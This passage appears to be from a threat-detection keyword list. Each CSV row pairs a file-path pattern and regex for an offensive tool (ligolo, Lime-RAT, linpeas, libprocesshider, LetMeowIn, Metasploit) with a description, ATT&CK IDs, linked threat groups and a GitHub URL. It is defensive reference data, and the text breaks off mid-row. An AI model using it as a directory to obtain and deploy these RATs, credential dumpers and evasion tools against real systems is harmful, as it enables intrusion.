"*/ldap-search.nse*",".{0,1000}\/ldap\-search\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","8480" "*/ldapsearch-ad.git*",".{0,1000}\/ldapsearch\-ad\.git.{0,1000}","offensive_tool_keyword","ldapsearch-ad","Python3 script to quickly get various information from a domain controller through his LDAP service.","T1018 - T1087 - T1069","TA0007 - TA0002 - TA0008","N/A","N/A","Reconnaissance","https://github.com/yaap7/ldapsearch-ad","1","1","#linux #windows","N/A","5","3","215","36","2024-12-10T17:00:02Z","2019-12-08T00:25:57Z","8481" "*/ldapsearch-ad.py*",".{0,1000}\/ldapsearch\-ad\.py.{0,1000}","offensive_tool_keyword","arsenal","Arsenal is just a quick inventory and launcher for hacking programs","T1596 - T1587","TA0042 - TA0001","N/A","N/A","Exploitation tool","https://github.com/Orange-Cyberdefense/arsenal","1","1","N/A","commands cheat sheets","8","10","3399","511","2024-11-29T14:48:20Z","2020-09-02T13:24:50Z","8482" "*/LDAPWordlistHarvester.git*",".{0,1000}\/LDAPWordlistHarvester\.git.{0,1000}","offensive_tool_keyword","LDAPWordlistHarvester","A tool to generate a wordlist from the information present in LDAP in order to crack passwords of domain accounts.","T1210.001 - T1087.003 - T1110","TA0001 - TA0006 - TA0007","N/A","Black Basta","Credential Access","https://github.com/p0dalirius/LDAPWordlistHarvester","1","1","N/A","N/A","5","4","N/A","N/A","N/A","N/A","8483" "*/ldeep/*",".{0,1000}\/ldeep\/.{0,1000}","offensive_tool_keyword","ldeep","In-depth ldap enumeration utility","T1087.002 - T1018 - T1482 - T1083","TA0007 - TA0008 - 
TA0009","N/A","N/A","Reconnaissance","https://github.com/franc-pentest/ldeep","1","1","N/A","N/A","5","5","465","54","2025-03-02T18:43:27Z","2018-10-22T18:21:44Z","8484" "*/ldeepDump*",".{0,1000}\/ldeepDump.{0,1000}","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Black Basta","Discovery","https://github.com/lefayjey/linWinPwn","1","1","#linux","N/A","10","10","1953","283","2025-04-15T14:51:50Z","2021-12-16T22:13:10Z","8485" "*/LdrLockLiberator.git*",".{0,1000}\/LdrLockLiberator\.git.{0,1000}","offensive_tool_keyword","LdrLockLiberator","LdrLockLiberator is a collection of techniques for escaping or otherwise forgoing Loader Lock while executing your code from DllMain or anywhere else the lock may be present.","T1574.002 - T1055","TA0005","N/A","N/A","Defense Evasion","https://github.com/ElliotKillick/LdrLockLiberator","1","1","N/A","N/A","9","4","375","65","2024-10-29T23:05:45Z","2023-10-31T10:11:16Z","8486" "*/legba.git*",".{0,1000}\/legba\.git.{0,1000}","offensive_tool_keyword","legba","A multiprotocol credentials bruteforcer / password sprayer and enumerator","T1110 - T1110.003 - T1110.001","TA0006 - TA0007","N/A","N/A","Credential Access","https://github.com/evilsocket/legba","1","1","N/A","N/A","10","10","1577","93","2025-03-01T15:42:29Z","2023-10-23T15:44:06Z","8487" "*/legba/target/release/legba*",".{0,1000}\/legba\/target\/release\/legba.{0,1000}","offensive_tool_keyword","legba","A multiprotocol credentials bruteforcer / password sprayer and enumerator","T1110 - T1110.003 - T1110.001","TA0006 - TA0007","N/A","N/A","Credential Access","https://github.com/evilsocket/legba","1","0","#linux","N/A","10","10","1577","93","2025-03-01T15:42:29Z","2023-10-23T15:44:06Z","8488" 
"*/letmein.ps1*",".{0,1000}\/letmein\.ps1.{0,1000}","offensive_tool_keyword","merlin","Merlin is a post-exploit Command & Control (C2) tool also known as a Remote Access Tool (RAT)","T1219 - T1105 - T1071 - T1090 - T1055 - T1047","TA0005 - TA0002 - TA0003 - TA0006 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Ne0nd0g/merlin","1","1","N/A","N/A","10","10","5221","826","2025-04-17T15:08:42Z","2017-01-06T11:18:20Z","8489" "*/LetMeOutSharp/*",".{0,1000}\/LetMeOutSharp\/.{0,1000}","offensive_tool_keyword","cobaltstrike","Project to enumerate proxy configurations and generate shellcode from CobaltStrike","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY 
BEAR - Sandworm","C2","https://github.com/EncodeGroup/AggressiveProxy","1","1","N/A","N/A","10","10","141","25","2020-11-04T16:08:11Z","2020-11-04T12:53:00Z","8490" "*/LetMeowIn.git*",".{0,1000}\/LetMeowIn\.git.{0,1000}","offensive_tool_keyword","LetMeowIn","A sophisticated covert Windows-based credential dumper using C++ and MASM x64.","T1003 - T1055.011 - T1148","TA0006","N/A","N/A","Credential Access","https://github.com/Meowmycks/LetMeowIn","1","1","N/A","N/A","10","5","401","70","2024-07-08T15:58:37Z","2024-04-09T16:33:27Z","8491" "*/lexmark-config.nse*",".{0,1000}\/lexmark\-config\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","8494" "*/lfs_injection.exe*",".{0,1000}\/lfs_injection\.exe.{0,1000}","offensive_tool_keyword","RustRedOps","RustRedOps is a repository dedicated to gathering and sharing advanced techniques and offensive malware for Red Team","T1027.002 - T1053.005 - T1204.002 - T1588.002","TA0005 - TA0002 - TA0003 - TA0042","N/A","N/A","Exploitation tool","https://github.com/joaoviictorti/RustRedOps","1","1","N/A","N/A","10","10","1548","176","2025-04-20T18:50:04Z","2023-11-29T16:07:06Z","8495" "*/lgandx/Responder*",".{0,1000}\/lgandx\/Responder.{0,1000}","offensive_tool_keyword","icebreaker","Gets plaintext Active Directory credentials if you're on the internal network but outside the AD environment","T1110.001 - T1110.003 - T1059.003","TA0006 - TA0001 - TA0002","N/A","N/A","Credential 
Access","https://github.com/DanMcInerney/icebreaker","1","0","#linux","N/A","10","10","1190","163","2018-10-24T18:14:53Z","2017-12-04T03:42:28Z","8496" "*/lib/GHunt/*",".{0,1000}\/lib\/GHunt\/.{0,1000}","offensive_tool_keyword","SocialPwned","SocialPwned is an OSINT tool that allows to get the emails. from a target. published in social networks like Instagram. Linkedin and Twitter to find the possible credential leaks in PwnDB or Dehashed and obtain Google account information via GHunt.","T1596","TA0002","N/A","N/A","Reconnaissance","https://github.com/MrTuxx/SocialPwned","1","1","N/A","N/A","N/A","10","1139","106","2025-01-28T19:07:29Z","2020-04-07T22:25:38Z","8497" "*/lib/gsocket_*.so*",".{0,1000}\/lib\/gsocket_.{0,1000}\.so.{0,1000}","offensive_tool_keyword","gsocket","The Global Socket Toolkit allows two users behind NAT/Firewall to establish a TCP connection with each other. Securely.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/hackerschoice/gsocket","1","0","#linux","N/A","10","10","1671","142","2025-04-22T14:47:29Z","2020-09-18T16:14:22Z","8498" "*/lib/ipLookupHelper.py*",".{0,1000}\/lib\/ipLookupHelper\.py.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike C2 Reverse proxy that fends off Blue Teams. AVs. EDRs. 
scanners through packet inspection and malleable profile correlation","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/mgeeky/RedWarden","1","1","N/A","N/A","10","10","964","143","2022-10-07T14:05:25Z","2021-05-15T22:05:39Z","8499" "*/lib/msf/*",".{0,1000}\/lib\/msf\/.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. 
Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Framework","https://github.com/rapid7/metasploit-framework","1","1","N/A","N/A","10","10","35400","14272","2025-04-22T20:14:59Z","2011-08-30T06:13:20Z","8500" "*/lib/systemd/system/evil.service*",".{0,1000}\/lib\/systemd\/system\/evil\.service.{0,1000}","offensive_tool_keyword","panix","PANIX is a highly customizable Linux persistence tool","T1068 - T1543.003 - T1546.004 - T1169 - T1059 - T1136.001 - T1546.001 - T1078.003 - T1564.001 - T1053 - T1003.008 - T1543.002 - T1053.002 - T1546.012","TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/Aegrah/PANIX","1","0","#linux","N/A","8","7","622","68","2025-03-05T10:45:04Z","2024-05-19T12:37:40Z","8501" "*/libgobuster*",".{0,1000}\/libgobuster.{0,1000}","offensive_tool_keyword","gobuster","Directory/File DNS and VHost busting tool written in Go","T1046 - T1590.002 - T1590.005","TA0007 - TA0043 - TA0006","N/A","Volatile Cedar","Reconnaissance","https://github.com/OJ/gobuster","1","1","#linux","network exploitation tool","N/A","10","11434","1338","2025-04-17T06:41:43Z","2014-11-14T13:18:35Z","8503" "*/liboffsetfinder64*",".{0,1000}\/liboffsetfinder64.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. 
vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Framework","https://github.com/rapid7/metasploit-framework","1","1","N/A","N/A","10","10","35400","14272","2025-04-22T20:14:59Z","2011-08-30T06:13:20Z","8504" "*/libprocesshider.git*",".{0,1000}\/libprocesshider\.git.{0,1000}","offensive_tool_keyword","libprocesshider","Hide a process under Linux using the ld preloader","T1055 - T1564 - T1620","TA0005 ","N/A","Sandworm","Defense Evasion","https://github.com/gianlucaborello/libprocesshider","1","1","#linux","N/A","9","10","1061","320","2019-08-02T14:28:28Z","2014-08-16T01:09:30Z","8505" "*/libprocesshider.so*",".{0,1000}\/libprocesshider\.so.{0,1000}","offensive_tool_keyword","libprocesshider","Hide a process under Linux using the ld preloader","T1055 - T1564 - T1620","TA0005 ","N/A","Sandworm","Defense Evasion","https://github.com/gianlucaborello/libprocesshider","1","0","#linux","N/A","9","10","1061","320","2019-08-02T14:28:28Z","2014-08-16T01:09:30Z","8506" "*/libs/powershells/upload.ps1*",".{0,1000}\/libs\/powershells\/upload\.ps1.{0,1000}","offensive_tool_keyword","atexec-pro","Fileless 
atexec for lateral movement","T1021.002 - T1105","TA0008 - TA0011","N/A","N/A","Lateral Movement","https://github.com/Ridter/atexec-pro","1","0","#linux","N/A","10","4","366","45","2024-03-28T03:36:50Z","2024-03-27T09:15:00Z","8508" "*/LibSnaffle*",".{0,1000}\/LibSnaffle.{0,1000}","offensive_tool_keyword","Group3r","Find vulnerabilities in AD Group Policy","T1484.002 - T1069.002 - T1087.002","TA0007 - TA0040","N/A","KNOTWEED","Discovery","https://github.com/Group3r/Group3r","1","1","N/A","AD Enumeration","7","8","781","68","2025-04-08T05:03:34Z","2021-07-05T05:05:42Z","8509" "*/LightsOut.git*",".{0,1000}\/LightsOut\.git.{0,1000}","offensive_tool_keyword","LightsOut","Generate an obfuscated DLL that will disable AMSI & ETW","T1027.003 - T1059.001 - T1082","TA0005 - TA0002 - TA0004","N/A","N/A","Exploitation tool","https://github.com/icyguider/LightsOut","1","1","N/A","N/A","10","4","321","44","2024-07-15T21:29:16Z","2023-06-01T14:57:44Z","8510" "*/ligolo.git*",".{0,1000}\/ligolo\.git.{0,1000}","offensive_tool_keyword","ligolo","ligolo is a simple and lightweight tool for establishing SOCKS5 or TCP tunnels from a reverse connection in complete safety (TLS certificate with elliptical curve)","T1071 - T1021 - T1573","TA0011 - TA0002","N/A","AvosLocker - LockBit","C2","https://github.com/sysdream/ligolo","1","1","N/A","N/A","10","10","1764","224","2023-01-06T19:49:22Z","2020-05-22T07:58:13Z","8511" "*/ligolo_agent*",".{0,1000}\/ligolo_agent.{0,1000}","offensive_tool_keyword","ligolo","ligolo is a simple and lightweight tool for establishing SOCKS5 or TCP tunnels from a reverse connection in complete safety (TLS certificate with elliptical curve)","T1071 - T1021 - T1573","TA0011 - TA0002","N/A","AvosLocker - LockBit","C2","https://github.com/sysdream/ligolo","1","0","#linux","N/A","10","10","1764","224","2023-01-06T19:49:22Z","2020-05-22T07:58:13Z","8512" "*/ligolo_agent.exe*",".{0,1000}\/ligolo_agent\.exe.{0,1000}","offensive_tool_keyword","ligolo","ligolo is a simple 
and lightweight tool for establishing SOCKS5 or TCP tunnels from a reverse connection in complete safety (TLS certificate with elliptical curve)","T1071 - T1021 - T1573","TA0011 - TA0002","N/A","AvosLocker - LockBit","C2","https://github.com/sysdream/ligolo","1","1","N/A","N/A","10","10","1764","224","2023-01-06T19:49:22Z","2020-05-22T07:58:13Z","8513" "*/ligolo-ng*",".{0,1000}\/ligolo\-ng.{0,1000}","offensive_tool_keyword","ligolo","ligolo is a simple and lightweight tool for establishing SOCKS5 or TCP tunnels from a reverse connection in complete safety (TLS certificate with elliptical curve)","T1071 - T1021 - T1573","TA0011 - TA0002","N/A","AvosLocker - LockBit","C2","https://github.com/sysdream/ligolo","1","1","N/A","N/A","10","10","1764","224","2023-01-06T19:49:22Z","2020-05-22T07:58:13Z","8514" "*/ligolo-ng.git*",".{0,1000}\/ligolo\-ng\.git.{0,1000}","offensive_tool_keyword","ligolo-ng","An advanced tunneling tool that uses TUN interfaces","T1572 - T1090","TA0011","N/A","Dispossessor - AvosLocker - LockBit","C2","https://github.com/nicocha30/ligolo-ng","1","1","N/A","N/A","10","10","3380","338","2025-04-17T07:48:36Z","2021-07-28T12:55:36Z","8515" "*/ligolo-ng/releases*",".{0,1000}\/ligolo\-ng\/releases.{0,1000}","offensive_tool_keyword","ligolo-ng","An advanced tunneling tool that uses TUN interfaces","T1572 - T1090","TA0011","N/A","Dispossessor - AvosLocker - LockBit","C2","https://github.com/nicocha30/ligolo-ng","1","1","N/A","N/A","10","10","3380","338","2025-04-17T07:48:36Z","2021-07-28T12:55:36Z","8516" "*/ligolo-proxy*",".{0,1000}\/ligolo\-proxy.{0,1000}","offensive_tool_keyword","ligolo","ligolo is a simple and lightweight tool for establishing SOCKS5 or TCP tunnels from a reverse connection in complete safety (TLS certificate with elliptical curve)","T1071 - T1021 - T1573","TA0011 - TA0002","N/A","AvosLocker - 
LockBit","C2","https://github.com/sysdream/ligolo","1","0","N/A","N/A","10","10","1764","224","2023-01-06T19:49:22Z","2020-05-22T07:58:13Z","8517" "*/ligolo-selfcert*",".{0,1000}\/ligolo\-selfcert.{0,1000}","offensive_tool_keyword","ligolo","ligolo is a simple and lightweight tool for establishing SOCKS5 or TCP tunnels from a reverse connection in complete safety (TLS certificate with elliptical curve)","T1071 - T1021 - T1573","TA0011 - TA0002","N/A","AvosLocker - LockBit","C2","https://github.com/sysdream/ligolo","1","0","N/A","N/A","10","10","1764","224","2023-01-06T19:49:22Z","2020-05-22T07:58:13Z","8518" "*/Lime-Crypter.git*",".{0,1000}\/Lime\-Crypter\.git.{0,1000}","offensive_tool_keyword","Lime-Crypter","An obfuscation tool for .Net + Native files","T1027 - T1045","TA0005 ","N/A","N/A","Defense Evasion","https://github.com/NYAN-x-CAT/Lime-Crypter","1","1","N/A","N/A","9","6","515","199","2024-04-22T21:31:18Z","2018-07-14T13:44:58Z","8519" "*/Lime-RAT-*.zip*",".{0,1000}\/Lime\-RAT\-.{0,1000}\.zip.{0,1000}","offensive_tool_keyword","Lime-RAT","remote administration tool for Windows (RAT)","T1059 - T1573.001 - T1027 - T1091 - T1486 - T1036 - T1560 - T1566 - T1480 - T1498 - T1113 - T1083 - T1016 - T1105 - T1056 - T1021 - T1112 - T1082 - T1072 - T1076 - T1078 - T1209 - T1003 - T1012 - T1100 - T1135 - T1108 - T1029 - T1547 - T1053 - T1060 - T1102 - T1124 - T1049 - T1123 - T1145 - T1210 - T1046 - T1010 - T1055","TA0040 - TA0010 - TA0005 - TA0011 - TA0043 - TA0006 - TA0042 - TA0008 - TA0009 - TA0007 - TA0002 - TA0003","N/A","APT-C-36 - Operation Comando","Malware","https://github.com/NYAN-x-CAT/Lime-RAT","1","1","N/A","N/A","10","10","1086","413","2019-06-24T17:05:48Z","2018-02-07T15:35:56Z","8520" "*/LimeRAT.exe*",".{0,1000}\/LimeRAT\.exe.{0,1000}","offensive_tool_keyword","Lime-RAT","remote administration tool for Windows (RAT)","T1059 - T1573.001 - T1027 - T1091 - T1486 - T1036 - T1560 - T1566 - T1480 - T1498 - T1113 - T1083 - T1016 - T1105 - T1056 - T1021 - T1112 
- T1082 - T1072 - T1076 - T1078 - T1209 - T1003 - T1012 - T1100 - T1135 - T1108 - T1029 - T1547 - T1053 - T1060 - T1102 - T1124 - T1049 - T1123 - T1145 - T1210 - T1046 - T1010 - T1055","TA0040 - TA0010 - TA0005 - TA0011 - TA0043 - TA0006 - TA0042 - TA0008 - TA0009 - TA0007 - TA0002 - TA0003","N/A","APT-C-36 - Operation Comando","Malware","https://github.com/NYAN-x-CAT/Lime-RAT","1","1","N/A","N/A","10","10","1086","413","2019-06-24T17:05:48Z","2018-02-07T15:35:56Z","8521" "*/Lime-RAT.git*",".{0,1000}\/Lime\-RAT\.git.{0,1000}","offensive_tool_keyword","Lime-RAT","remote administration tool for Windows (RAT)","T1059 - T1573.001 - T1027 - T1091 - T1486 - T1036 - T1560 - T1566 - T1480 - T1498 - T1113 - T1083 - T1016 - T1105 - T1056 - T1021 - T1112 - T1082 - T1072 - T1076 - T1078 - T1209 - T1003 - T1012 - T1100 - T1135 - T1108 - T1029 - T1547 - T1053 - T1060 - T1102 - T1124 - T1049 - T1123 - T1145 - T1210 - T1046 - T1010 - T1055","TA0040 - TA0010 - TA0005 - TA0011 - TA0043 - TA0006 - TA0042 - TA0008 - TA0009 - TA0007 - TA0002 - TA0003","N/A","APT-C-36 - Operation Comando","Malware","https://github.com/NYAN-x-CAT/Lime-RAT","1","1","N/A","N/A","10","10","1086","413","2019-06-24T17:05:48Z","2018-02-07T15:35:56Z","8522" "*/LimeRAT.v*.zip*",".{0,1000}\/LimeRAT\.v.{0,1000}\.zip.{0,1000}","offensive_tool_keyword","Lime-RAT","remote administration tool for Windows (RAT)","T1059 - T1573.001 - T1027 - T1091 - T1486 - T1036 - T1560 - T1566 - T1480 - T1498 - T1113 - T1083 - T1016 - T1105 - T1056 - T1021 - T1112 - T1082 - T1072 - T1076 - T1078 - T1209 - T1003 - T1012 - T1100 - T1135 - T1108 - T1029 - T1547 - T1053 - T1060 - T1102 - T1124 - T1049 - T1123 - T1145 - T1210 - T1046 - T1010 - T1055","TA0040 - TA0010 - TA0005 - TA0011 - TA0043 - TA0006 - TA0042 - TA0008 - TA0009 - TA0007 - TA0002 - TA0003","N/A","APT-C-36 - Operation Comando","Malware","https://github.com/NYAN-x-CAT/Lime-RAT","1","1","N/A","N/A","10","10","1086","413","2019-06-24T17:05:48Z","2018-02-07T15:35:56Z","8523" 
"*/Lime-RAT/releases/download/*",".{0,1000}\/Lime\-RAT\/releases\/download\/.{0,1000}","offensive_tool_keyword","Lime-RAT","remote administration tool for Windows (RAT)","T1059 - T1573.001 - T1027 - T1091 - T1486 - T1036 - T1560 - T1566 - T1480 - T1498 - T1113 - T1083 - T1016 - T1105 - T1056 - T1021 - T1112 - T1082 - T1072 - T1076 - T1078 - T1209 - T1003 - T1012 - T1100 - T1135 - T1108 - T1029 - T1547 - T1053 - T1060 - T1102 - T1124 - T1049 - T1123 - T1145 - T1210 - T1046 - T1010 - T1055","TA0040 - TA0010 - TA0005 - TA0011 - TA0043 - TA0006 - TA0042 - TA0008 - TA0009 - TA0007 - TA0002 - TA0003","N/A","APT-C-36 - Operation Comando","Malware","https://github.com/NYAN-x-CAT/Lime-RAT","1","1","N/A","N/A","10","10","1086","413","2019-06-24T17:05:48Z","2018-02-07T15:35:56Z","8524" "*/LimeRAT-MUSIC.MP3*",".{0,1000}\/LimeRAT\-MUSIC\.MP3.{0,1000}","offensive_tool_keyword","Lime-RAT","remote administration tool for Windows (RAT)","T1059 - T1573.001 - T1027 - T1091 - T1486 - T1036 - T1560 - T1566 - T1480 - T1498 - T1113 - T1083 - T1016 - T1105 - T1056 - T1021 - T1112 - T1082 - T1072 - T1076 - T1078 - T1209 - T1003 - T1012 - T1100 - T1135 - T1108 - T1029 - T1547 - T1053 - T1060 - T1102 - T1124 - T1049 - T1123 - T1145 - T1210 - T1046 - T1010 - T1055","TA0040 - TA0010 - TA0005 - TA0011 - TA0043 - TA0006 - TA0042 - TA0008 - TA0009 - TA0007 - TA0002 - TA0003","N/A","APT-C-36 - Operation Comando","Malware","https://github.com/NYAN-x-CAT/Lime-RAT","1","1","N/A","N/A","10","10","1086","413","2019-06-24T17:05:48Z","2018-02-07T15:35:56Z","8525" "*/LinEnum.git*",".{0,1000}\/LinEnum\.git.{0,1000}","offensive_tool_keyword","LinEnum","Scripted Local Linux Enumeration & Privilege Escalation Checks","T1046 - T1087.001 - T1057 - T1082 - T1016 - T1135 - T1049 - T1059.004 - T1007 - T1069.001 - T1083 - T1018","TA0007 - TA0009 - TA0002 - TA0003 - TA0001","N/A","N/A","Privilege 
Escalation","https://github.com/rebootuser/LinEnum","1","1","#linux","N/A","10","10","7309","2011","2023-09-06T18:02:29Z","2013-08-20T06:26:58Z","8526" "*/LinEnum/*",".{0,1000}\/LinEnum\/.{0,1000}","offensive_tool_keyword","LinEnum","Scripted Local Linux Enumeration & Privilege Escalation Checks","T1046 - T1087.001 - T1057 - T1082 - T1016 - T1135 - T1049 - T1059.004 - T1007 - T1069.001 - T1083 - T1018","TA0007 - TA0009 - TA0002 - TA0003 - TA0001","N/A","N/A","Privilege Escalation","https://github.com/rebootuser/LinEnum","1","1","#linux","N/A","10","10","7309","2011","2023-09-06T18:02:29Z","2013-08-20T06:26:58Z","8527" "*/linikatz.git*",".{0,1000}\/linikatz\.git.{0,1000}","offensive_tool_keyword","linikatz","linikatz is a tool to attack AD on UNIX","T1003.002 - T1558.003 - T1078 - T1550.001","TA0006 - TA0001 - TA0004 - TA0003","N/A","N/A","Exploitation tool","https://github.com/CiscoCXSecurity/linikatz","1","1","#linux","N/A","10","6","552","79","2023-10-19T17:01:47Z","2018-11-15T22:19:47Z","8528" "*/LinikatzV2/*",".{0,1000}\/LinikatzV2\/.{0,1000}","offensive_tool_keyword","LinikatzV2","linikatz is a tool to attack AD on UNIX","T1003.002 - T1558.003 - T1078 - T1550.001","TA0006 - TA0001 - TA0004 - TA0003","N/A","N/A","Exploitation tool","https://github.com/Orange-Cyberdefense/LinikatzV2","1","1","#linux","N/A","10","2","146","15","2023-10-19T12:26:58Z","2023-10-19T11:07:53Z","8529" "*/linpeas.sh*",".{0,1000}\/linpeas\.sh.{0,1000}","offensive_tool_keyword","D3m0n1z3dShell","Demonized Shell is an Advanced Tool for persistence in linux","T1098 - T1543.003 - T1547 - T1053.005 - T1546.004 - T1548.003 - T1014 - T1055.001 - T1105 - T1574.006 - T1003 - T1057 - T1055 - T1027 - T1497.001 - T1037.004 - T1037","TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0011","N/A","N/A","Persistence","https://github.com/MatheuZSecurity/D3m0n1z3dShell","1","1","#linux","N/A","10","4","373","54","2025-01-05T13:56:51Z","2023-05-30T02:30:47Z","8530" 
"*/linpeas.sh*",".{0,1000}\/linpeas\.sh.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559","TA0043 - TA0002 - TA0004 - TA0011 - TA0003","N/A","Black Basta","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","#linux","N/A","10","10","2354","209","2025-04-09T16:56:24Z","2020-03-09T19:12:11Z","8531" "*/linpeas.sh*",".{0,1000}\/linpeas\.sh.{0,1000}","offensive_tool_keyword","PEASS","PEASS - Privilege Escalation Awesome Scripts SUITE","T1068 - T1055 - T1053 - T1059 - T1134 - T1216 - T1003 - T1187 - T1548.001 - T1548.002","TA0002 - TA0004 - TA0006 - TA0008 - TA0007 - TA0005","N/A","Scattered Spider* - PLAY - EMBER BEAR - COZY BEAR - Dispossessor","Privilege Escalation","https://github.com/carlospolop/PEASS-ng","1","1","N/A","N/A","N/A","10","17347","3209","2025-04-01T04:29:00Z","2019-01-13T19:58:24Z","8532" "*/linpeas.sh*",".{0,1000}\/linpeas\.sh.{0,1000}","offensive_tool_keyword","PEASS","PEASS - Privilege Escalation Awesome Scripts SUITE","T1068 - T1055 - T1053 - T1059 - T1134 - T1216 - T1003 - T1187 - T1548.001 - T1548.002","TA0002 - TA0004 - TA0006 - TA0008 - TA0007 - TA0005","N/A","Scattered Spider* - PLAY - EMBER BEAR - COZY BEAR - Dispossessor","Privilege 